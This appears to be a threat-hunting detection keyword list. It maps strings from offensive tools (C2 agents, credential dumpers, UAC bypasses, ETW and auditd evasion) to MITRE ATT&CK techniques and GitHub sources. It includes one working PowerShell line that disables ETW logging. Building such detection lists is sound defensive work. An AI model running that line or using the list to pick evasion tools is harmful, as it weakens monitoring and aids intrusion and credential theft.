-*[*] Updating downloaded GPO version number to ensure automatic GPO application*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*[-] failed to spawn shell: %s*,offensive_tool_keyword,EQGR,Equation Group hack tool leaked by ShadowBrokers- file elgingamble Local exploit for the public prctl core dump vulnerability in recent Linux kernels,T1213.001 - T1203.001,TA0001 - TA0003,N/A,N/A,Shell spawning,https://fdik.org/EQGRP/Linux/doc/old/etc/user.tool.elgingamble.COMMON,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*[-] kernel not vulnerable*,offensive_tool_keyword,EQGR,Equation Group hack tool leaked by ShadowBrokers- file elgingamble Local exploit for the public prctl core dump vulnerability in recent Linux kernels.,T1213.001 - T1203.001,TA0001 - TA0003,N/A,N/A,Shell spawning,https://fdik.org/EQGRP/Linux/doc/old/etc/user.tool.elgingamble.COMMON,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*[-] Seems like we killed auditd. Ooopsie :D*,offensive_tool_keyword,apollon,evade auditd by writing /proc/PID/mem,T1054.001 - T1055.001 - T1012,TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/codewhitesec/apollon,1,0,N/A,8,1,13,5,2023-08-21T05:43:36Z,2023-07-31T11:55:43Z -*[+] Adding your DLL to the LSA Security Packages registry key*,offensive_tool_keyword,ImplantSSP,Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start,T1547.008 - T1073.001 - T1055.001,TA0003 - TA0005,N/A,N/A,Persistence - Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*[+] Attack aborted. Exiting*,offensive_tool_keyword,ShadowSpray,A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.,T1110.003 - T1098 - T1059 - T1075,TA0001 - TA0008 - TA0009,N/A,N/A,Discovery,https://github.com/ShorSec/ShadowSpray,1,0,N/A,7,5,408,72,2022-10-14T13:36:51Z,2022-10-10T08:34:07Z -*[+] Attempting to call the target EXE from the mock directory*,offensive_tool_keyword,MockDirUACBypass,Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.,T1574.002 - T1547.008 - T1059.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*[+] auditd patched successfully*,offensive_tool_keyword,apollon,evade auditd by writing /proc/PID/mem,T1054.001 - T1055.001 - T1012,TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/codewhitesec/apollon,1,0,N/A,8,1,13,5,2023-08-21T05:43:36Z,2023-07-31T11:55:43Z -*[+] Back to C&C Console*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,0,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*[+] Bof replay:*,offensive_tool_keyword,Nightmangle,ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/1N73LL1G3NC3x/Nightmangle,1,0,N/A,10,10,72,10,2023-09-26T19:21:31Z,2023-09-26T18:25:23Z -*[+] Creating mock directories*,offensive_tool_keyword,MockDirUACBypass,Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.,T1574.002 - T1547.008 - T1059.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*[+] Deobfuscated dump saved in file decrypted.dmp*,offensive_tool_keyword,PPLBlade,Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.,T1003.001 - T1027.004 - T1560.001 - T1039 - T1570,TA0006 - TA0005 - TA0010 - TA0003,N/A,N/A,Credential Access - Data Exfiltration,https://github.com/tastypepperoni/PPLBlade,1,0,N/A,10,4,324,36,2023-08-30T07:59:51Z,2023-08-29T19:36:04Z -*[+] Enumerating driver services...*,offensive_tool_keyword,DriverQuery,Collect details about drivers on the system and optionally filter to find only ones not signed by Microsoft,T1124 - T1057 - T1082,TA0007 - TA0003,N/A,N/A,Discovery,https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -"*[+] ETW Patched, No Logs No Crime !*",offensive_tool_keyword,Fuck-Etw,Bypass the Event Trace Windows(ETW) and unhook ntdll.,T1070.004 - T1055.001,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/unkvolism/Fuck-Etw,1,0,N/A,10,1,63,9,2023-09-29T21:19:10Z,2023-09-25T18:59:10Z -*[+] Generated XOR key: *,offensive_tool_keyword,Supernova,securely encrypt raw shellcodes,T1027 - T1055.004 - T1140,TA0002 - TA0005 - TA0042,N/A,N/A,Exploitation tools,https://github.com/nickvourd/Supernova,1,0,N/A,10,4,337,49,2023-09-28T20:56:28Z,2023-08-08T11:30:34Z -*[+] Generating base64 encoded PowerShell script*,offensive_tool_keyword,SpaceRunner,enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.,T1059.001 - T1027,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Mr-B0b/SpaceRunner,1,0,N/A,7,2,185,38,2020-07-26T10:39:53Z,2020-07-26T09:31:09Z -*[+] Keylogger started*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,0,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*[+] Keylogger stopped*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,0,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*[+] keystrokes dump from agent*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*[+] Opened Process Token Sucessufully!*,offensive_tool_keyword,BesoToken,A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).,T1134 - T1003.002,TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/OmriBaso/BesoToken,1,0,N/A,10,1,91,11,2022-11-23T10:45:07Z,2022-11-21T01:07:51Z -*[+] Registry key set. DLL will be loaded on reboot*,offensive_tool_keyword,ImplantSSP,Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start,T1547.008 - T1073.001 - T1055.001,TA0003 - TA0005,N/A,N/A,Persistence - Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*[+] Safety checks passed. Implanting your DLL*,offensive_tool_keyword,ImplantSSP,Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start,T1547.008 - T1073.001 - T1055.001,TA0003 - TA0005,N/A,N/A,Persistence - Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*[+] Save encrypted shellcode to *,offensive_tool_keyword,Supernova,securely encrypt raw shellcodes,T1027 - T1055.004 - T1140,TA0002 - TA0005 - TA0042,N/A,N/A,Exploitation tools,https://github.com/nickvourd/Supernova,1,0,N/A,10,4,337,49,2023-09-28T20:56:28Z,2023-08-08T11:30:34Z -*[+] SeImpersonatePrivilege enabled*,offensive_tool_keyword,Nightmangle,ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/1N73LL1G3NC3x/Nightmangle,1,0,N/A,10,10,72,10,2023-09-26T19:21:31Z,2023-09-26T18:25:23Z -*[+] Stole token from*,offensive_tool_keyword,Gotato,Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.,T1003.003 - T1056.002 - T1550.001 - T1090,TA0005 - TA0004 - TA0009,N/A,N/A,Privilege Escalation,https://github.com/iammaguire/Gotato,1,0,N/A,9,2,114,16,2021-06-07T21:19:58Z,2021-06-05T22:32:48Z -*[+] Successfully downloaded legitimate GPO from SYSVOL to *,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*[+] Successfully injected malicious scheduled task*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*[+] Successfully spoofed GPC gPCFileSysPath attribute*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*[+] The encrypted payload with *,offensive_tool_keyword,Supernova,securely encrypt raw shellcodes,T1027 - T1055.004 - T1140,TA0002 - TA0005 - TA0042,N/A,N/A,Exploitation tools,https://github.com/nickvourd/Supernova,1,0,N/A,10,4,337,49,2023-09-28T20:56:28Z,2023-08-08T11:30:34Z -*[+] Your payload must be executed now !*,offensive_tool_keyword,SetProcessInjection,alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.,T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012,TA0005 - TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/OtterHacker/SetProcessInjection,1,0,N/A,9,1,53,10,2023-10-02T09:23:42Z,2023-10-02T08:21:47Z -*[i] AAD Join:*enumerate*,offensive_tool_keyword,SharpAzbelt,This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources,T1082 - T1003 - T1027 - T1110 - T1078,TA0006 - TA0007 - TA0005 - TA0004 - TA0003,N/A,N/A,Discovery - Collection,https://github.com/redskal/SharpAzbelt,1,0,N/A,8,1,23,6,2023-09-21T21:47:32Z,2023-09-21T21:44:03Z -*[i] Credman:*Credential Blob Decrypted*,offensive_tool_keyword,SharpAzbelt,This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources,T1082 - T1003 - T1027 - T1110 - T1078,TA0006 - TA0007 - TA0005 - TA0004 - TA0003,N/A,N/A,Discovery - Collection,https://github.com/redskal/SharpAzbelt,1,0,N/A,8,1,23,6,2023-09-21T21:47:32Z,2023-09-21T21:44:03Z -*[i] Hooked Ntdll Base Address : *,offensive_tool_keyword,Fuck-Etw,Bypass the Event Trace Windows(ETW) and unhook ntdll.,T1070.004 - T1055.001,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/unkvolism/Fuck-Etw,1,0,N/A,10,1,63,9,2023-09-29T21:19:10Z,2023-09-25T18:59:10Z -*[i] Unhooked Ntdll Base Address: *,offensive_tool_keyword,Fuck-Etw,Bypass the Event Trace Windows(ETW) and unhook ntdll.,T1070.004 - T1055.001,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/unkvolism/Fuck-Etw,1,0,N/A,10,1,63,9,2023-09-29T21:19:10Z,2023-09-25T18:59:10Z -*[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled'*'NonPublic*Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider'*'NonPublic*Static').GetValue($null)*0)*,offensive_tool_keyword,powershell,impair the defenses of the targeted system by disabling ETW logging for PowerShell. This can make it difficult for security teams to monitor and analyze PowerShell activities on the system potentially allowing adversaries to perform malicious actions without being detected,T1562,TA0040,N/A,N/A,Defense Evasion,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*['spawnto']*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,0,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*[x] Cannot load NTDLL.DLL*,offensive_tool_keyword,SetProcessInjection,alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.,T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012,TA0005 - TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/OtterHacker/SetProcessInjection,1,0,N/A,9,1,53,10,2023-10-02T09:23:42Z,2023-10-02T08:21:47Z -*[X] Your harvest exploded:*,offensive_tool_keyword,combine_harvester,Rust in-memory dumper,T1055 - T1055.001 - T1055.012,TA0005 - TA0006,N/A,N/A,Defense Evasion,https://github.com/m3f157O/combine_harvester,1,0,N/A,10,2,101,17,2023-07-26T07:16:00Z,2023-07-20T07:37:51Z -*\ rev_shell.py*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,0,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*\*.O365.GroupMembership_AdminGroups.txt*,offensive_tool_keyword,o365recon,script to retrieve information via O365 and AzureAD with a valid cred ,T1110 - T1081 - T1081.001 - T1114 - T1087,TA0006 - TA0007,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/o365recon,1,0,N/A,N/A,7,617,94,2022-08-14T04:18:28Z,2017-09-02T17:19:42Z -*\*.O365.GroupMembership_VPNGroups.txt*,offensive_tool_keyword,o365recon,script to retrieve information via O365 and AzureAD with a valid cred ,T1110 - T1081 - T1081.001 - T1114 - T1087,TA0006 - TA0007,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/o365recon,1,0,N/A,N/A,7,617,94,2022-08-14T04:18:28Z,2017-09-02T17:19:42Z -*\*.O365.Roles_Admins.txt*,offensive_tool_keyword,o365recon,script to retrieve information via O365 and AzureAD with a valid cred ,T1110 - T1081 - T1081.001 - T1114 - T1087,TA0006 - TA0007,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/o365recon,1,0,N/A,N/A,7,617,94,2022-08-14T04:18:28Z,2017-09-02T17:19:42Z -*\:MLKH*,offensive_tool_keyword,powershell,powershell obfuscations techniques observed by malwares - reversed HKLM:\,T1021 - T1024 - T1027 - T1035 - T1059 - T1070,TA0001 - TA0002 - TA0003 - TA0005 - TA0006,Qakbot,N/A,Defense Evasion,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\\.\pipe\mimi*,offensive_tool_keyword,SharpBlock,A method of bypassing EDR active projection DLL by preventing entry point exection,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/CCob/SharpBlock,1,0,N/A,10,10,975,147,2021-03-31T09:44:48Z,2020-06-14T10:32:16Z -*\\.\pipe\pwned/pipe/srvsvc*,offensive_tool_keyword,MultiPotato,get SYSTEM via SeImpersonate privileges,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/S3cur3Th1sSh1t/MultiPotato,1,0,pipe name,10,5,485,87,2021-11-20T16:20:23Z,2021-11-19T15:50:55Z -*\\:C*,offensive_tool_keyword,powershell,powershell obfuscations techniques observed by malwares - reversed c:\\,T1021 - T1024 - T1027 - T1035 - T1059 - T1070,TA0001 - TA0002 - TA0003 - TA0005 - TA0006,Qakbot,N/A,Defense Evasion,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\\??\\Jormungandr*,offensive_tool_keyword,Jormungandr,Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel,T1215 - T1059.003 - T1547.006,TA0004 - TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Idov31/Jormungandr,1,0,N/A,N/A,3,203,23,2023-09-26T18:06:53Z,2023-06-25T06:24:16Z -*\\\\*\\*\\Get-FileLockProcess.ps1*,offensive_tool_keyword,smbmap,SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.,T1210.001 - T1083 - T1213 - T1021,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Information Gathering,https://github.com/ShawnDEvans/smbmap,1,0,N/A,10,10,1554,344,2023-09-14T20:51:52Z,2015-03-16T13:15:00Z -*\\\\.\\aswSP_Avar*,offensive_tool_keyword,BYOVD_kill_av_edr,BYOD to kill AV/EDR,T1562.001,TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/infosecn1nja/red-team-scripts/blob/main/BYOVD_kill_av_edr.c,1,0,N/A,10,3,228,42,2023-06-14T02:13:19Z,2023-01-15T22:37:34Z -*\\\\.\\pipe\\mal*,offensive_tool_keyword,Gotato,Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.,T1003.003 - T1056.002 - T1550.001 - T1090,TA0005 - TA0004 - TA0009,N/A,N/A,Privilege Escalation,https://github.com/iammaguire/Gotato,1,0,N/A,9,2,114,16,2021-06-07T21:19:58Z,2021-06-05T22:32:48Z -*\\\\.\\pipe\\warpzone8*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,0,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*\\\\127.0.0.1\\pipe\\warpzone8*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,0,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*\\127.0.0.1\c$*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*\\c$\Windows\Temp\*.dmp*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*\\DCSC_stdInPipe*,offensive_tool_keyword,SharpShellPipe,interactive remote shell access via named pipes and the SMB protocol.,T1056.002 - T1021.002 - T1059.001,TA0005 - TA0009 - TA0002,N/A,N/A,Lateral movement,https://github.com/DarkCoderSc/SharpShellPipe,1,0,N/A,8,1,97,14,2023-08-27T13:12:39Z,2023-08-25T15:18:30Z -*\\DCSC_stdOutPipe*,offensive_tool_keyword,SharpShellPipe,interactive remote shell access via named pipes and the SMB protocol.,T1056.002 - T1021.002 - T1059.001,TA0005 - TA0009 - TA0002,N/A,N/A,Lateral movement,https://github.com/DarkCoderSc/SharpShellPipe,1,0,N/A,8,1,97,14,2023-08-27T13:12:39Z,2023-08-25T15:18:30Z -*\\GetWebDAVStatus.exe*,offensive_tool_keyword,cobaltstrike,Determine if the WebClient Service (WebDAV) is running on a remote system,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/G0ldenGunSec/GetWebDAVStatus,1,0,N/A,10,10,81,18,2021-09-29T17:40:52Z,2021-09-29T17:31:21Z -*\\pipe\\DAV RPC SERVICE*,offensive_tool_keyword,cobaltstrike,Determine if the WebClient Service (WebDAV) is running on a remote system,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/G0ldenGunSec/GetWebDAVStatus,1,0,N/A,10,10,81,18,2021-09-29T17:40:52Z,2021-09-29T17:31:21Z -*\1.bat,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\1.dll,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\1.Encrypt_shellcode*,offensive_tool_keyword,ReflectiveNtdll,A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode,T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/reveng007/ReflectiveNtdll,1,0,N/A,10,2,147,22,2023-02-10T05:30:28Z,2023-01-30T08:43:16Z -*\1.exe,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\2.bat,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\2.dll,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\2.exe,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\3.bat,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\3.dll,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\3.exe,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\4.bat,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\4.dll,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\4.exe,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\5.bat,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\5.dll,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A -*\5.exe,greyware_tool_keyword,_,Suspicious file names - One caracter executables often used by threat actors (warning false positives),T1070.004 - T1059,TA0010 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,False positive rate can be high,2,10,N/A,N/A,N/A,N/A 